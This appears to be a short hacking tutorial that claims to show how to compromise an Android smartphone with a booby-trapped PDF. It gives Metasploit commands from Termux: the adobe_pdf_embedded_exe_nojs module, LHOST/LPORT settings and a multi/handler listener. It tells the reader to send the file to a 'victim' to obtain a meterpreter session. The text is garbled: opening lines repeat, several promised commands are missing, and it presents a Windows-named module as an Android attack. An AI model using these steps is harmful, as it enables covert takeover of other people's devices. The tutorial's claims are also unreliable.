The simplest attack that you can repeat even without a computer.
Hello everyone, dear friends, this article is about hacking an Android smartphone using a PDF file.
To carry out this attack, you can use not only a computer with Linux installed, but also your Android smartphone (you will need to install Termux).
Now we'll tell you everything in more detail...
After everything described above is done, you can start hacking.
Then you have to configure Localhost. For this you will need your IP address, to check its type, enter in a new session window on termux or in another terminal window:
That's all for today. Happy hunting!
Hello everyone, dear friends, this article is about hacking an Android smartphone using a PDF file.
To carry out this attack, you can use not only a computer with Linux installed, but also your Android smartphone (you will need to install Termux).
Now we'll tell you everything in more detail...
You will need:
- Termux app (download it from Play Store or F-Droid).
- Install Metasploit Framework in Termux.
- Termux must be able to use external storage (to do this, enter the command: termux-setup-storage).
- (Recommended but not required) Install Hacker'sKeyboard to easily enter commands in Termux.
After everything described above is done, you can start hacking.
Launching the Metasploit console
- Open Termux if you are using your smartphone, or Terminal if you are using a Linux computer.
- Enter the following command to open the Metasploit console
- If you see a screen like the one below, then everything is fine:

Create PDF file (Payload)
- Enter the command below:
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
Then you have to configure Localhost. For this you will need your IP address, to check its type, enter in a new session window on termux or in another terminal window:
- Now go to your metasploit console and enter your IP as follows:
set LHOST [Your IP]
Replace the IP address specified in the above command with your own IP address.
- Now it's time to configure the port. To do this, enter the following command:
set LPORT 4444
You can use any port, such as 4564, 8080, etc.
- Next we will generate our PDF file using the command below:
set filename Example.pdf
- Let's finish the creation process by entering the command:
- Now within a second a message will appear informing you that your PDF file has been created.
- All that's left is to send this file to your victim. Once they open it, you'll get a metasploit session.
- First, open the metasploit console by typing:
- And then enter the commands:
use exploit/multi/handler/ set LHOST <your_IP> set LPORT 4444 exploit
Make sure you enter the same IP address and port as above in step 2.
- It will take a little while, after which you will get a meterpreter session.
- Congratulations! You have gained access to the victim's smartphone and can do whatever you want with it.
That's all for today. Happy hunting!